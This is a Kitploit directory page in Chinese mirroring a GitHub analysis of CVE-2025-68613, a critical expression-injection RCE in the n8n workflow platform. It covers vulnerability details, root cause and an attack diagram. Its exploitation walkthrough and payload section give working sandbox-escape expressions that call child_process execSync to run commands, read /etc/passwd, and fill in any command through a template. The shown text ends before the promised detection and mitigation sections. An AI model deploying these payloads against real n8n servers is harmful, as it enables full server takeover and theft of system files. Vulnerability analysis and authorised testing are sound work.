Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-68613-n8n-rce-analysis — CVE-2025-68613 (n8n) 严重级 RCE 分析 + 防御建议(补丁验证、检测思路与加固技巧) | Kitploit
工具/GitHubGitHub/ak-cybe/cve-2025-68613-n8n-rce-analysis
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育事件响应
GitHubak-cybe/cve-2025-68613-n8n-rce-analysis

CVE-2025-68613-n8n-rce-analysis

CVE-2025-68613 (n8n) 严重级 RCE 分析 + 防御建议(补丁验证、检测思路与加固技巧)

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
1129个月前尚未审核
分享

Header Banner

Typing SVG

Severity CVSS Instances Status CWE

Hacker GIF Matrix GIF


Divider

📑 目录

  • 🎯 执行摘要
  • 🐛 漏洞详情
  • 🔬 技术分析
  • 💀 利用演练
  • 💥 影响评估
  • 🔍 检测与响应
  • 🛡️ 缓解策略
  • 📚 参考资料

🎯 执行摘要

Alert GIF

CVE-2025-68613 是 n8n 工作流自动化平台中的一个严重远程代码执行漏洞,允许经过身份验证的攻击者通过表达式注入执行任意系统命令。

⚡ 快速统计

🔥 指标📊 数值
CVSS 评分9.9 / 10
暴露实例数103,476+
攻击复杂度低
是否需要认证是(低权限)
用户交互无

🎯 关键事实

📌 属性📝 值
披露日期2025年12月18日
攻击向量网络 (AV:N)
影响范围已变更
影响CIA = 高
漏洞类型表达式注入

🐛 漏洞详情

Bug GIF

📋 CVE 概览

属性值
🆔 CVE IDCVE-2025-68613
📊 CVSS 评分9.9(严重)🔴
🔗 CVSS 向量CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
🏷️ CWECWE-913(对动态管理代码资源控制不当)
📦 受影响版本0.211.0 → 1.120.3, 1.121.0
✅ 已修补版本1.120.4, 1.121.1, 1.122.0+

🤖 什么是 n8n?

n8n 是一个开源工作流自动化平台,支持与 400 多个应用进行无代码/低代码集成。广泛部署于以下场景:

🏢 使用场景📝 描述
🔧 DevOps自动化流水线、CI/CD 集成
🛡️ 安全运维SOAR 工作流、应急响应
💼 业务流程自动化、数据工作流
📊 数据ETL 流程、API 集成

🔧 技术根因

🔓 漏洞链条:
┌─────────────────────────────────────────────────────────────────┐
│  📝 n8n 表达式语言 → 动态数据处理                              │
│                           ↓                                     │
│  ⚠️  服务端评估中沙箱隔离不足                                  │
│                           ↓                                     │
│  💀 恶意表达式绕过沙箱                                         │
│                           ↓                                     │
│  🖥️  访问 Node.js 的 child_process 模块                        │
│                           ↓                                     │
│  💥 完全远程代码执行 - 操作系统命令执行                        │
└─────────────────────────────────────────────────────────────────┘

🔬 技术分析

Analysis GIF

🎯 攻击面

利用前提条件:

#📋 条件📝 详情
1️⃣认证有效的 n8n 用户账户(低权限即可)
2️⃣权限创建工作流/编辑工作流的能力
3️⃣网络访问能够连接到 n8n 实例

⚔️ 攻击特征

🏷️ 属性📊 值🔥 风险
复杂度低 (AC:L)🔴 高
用户交互无需🔴 高
范围已变更🔴 严重

🗺️ 漏洞流程示意图

graph TD
    A[🔐 已认证用户] -->|创建| B[📝 新工作流]
    B -->|注入| C[💀 恶意表达式]
    C -->|触发| D[⚡ 表达式求值]
    D -->|利用| E[🔓 沙箱绕过]
    E -->|访问| F[🖥️ Node.js 运行时]
    F -->|执行| G[💥 通过 child_process 执行 OS 命令]
    G -->|实现| H[☠️ 完全服务器沦陷]
    
    style A fill:#4CAF50,color:#fff
    style C fill:#ff9800,color:#fff
    style E fill:#f44336,color:#fff
    style H fill:#9c27b0,color:#fff

💀 利用演练

Hacking GIF

⚠️ 免责声明:以下内容仅用于教育目的。未经授权的利用是非法的。

📸 逐步利用截图

🖥️ 第1步:访问 n8n 实例

初始访问易受攻击的 n8n 工作流自动化平台。

n8n Welcome Screen
🔓 n8n 欢迎仪表盘 - 入口点


➕ 第2步:创建新工作流

创建一个将包含恶意负载的新工作流。

New Workflow Creation
📝 使用“添加第一步”创建新工作流


⚡ 第3步:添加手动触发器

配置工作流触发器 - 手动触发器允许按需执行。

Manual Trigger Setup
🎯 选择手动触发器以激活工作流


📦 第4步:添加 Set 节点

添加“编辑字段 (Set)”节点,该节点将包含恶意表达式。

Set Node Selection
🔧 添加“编辑字段 (Set)”节点用于注入有效负载


💉 第5步:注入 RCE 有效负载

关键步骤 - 注入沙箱绕过表达式以实现远程代码执行。

RCE Payload Execution
💀 恶意表达式成功执行 'id' 命令!

// 🔴 恶意负载 (请勿非法使用)
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString(); })() }}

输出显示: uid=1000(node) gid=1000(node) groups=1000(node) ✅ RCE 确认!


💉 负载示例

Code Injection GIF

⚠️ 警告:这些有效负载仅用于授权的安全测试。未经授权使用是非法的!

🔹 ID 命令 (用户信息)

{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

🔹 PWD 命令 (当前目录)

{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}

🔹 文件读取 (/etc/passwd)

{{ (function(){ return this.process.mainModule.require('child_process').execSync('cat /etc/passwd').toString() })() }}

🔹 自定义命令模板

{{ (function(){ return this.process.mainModule.require('child_process').execSync('YOUR_COMMAND_HERE').toString() })() }}

📸 文件读取 PoC 截图

下载工具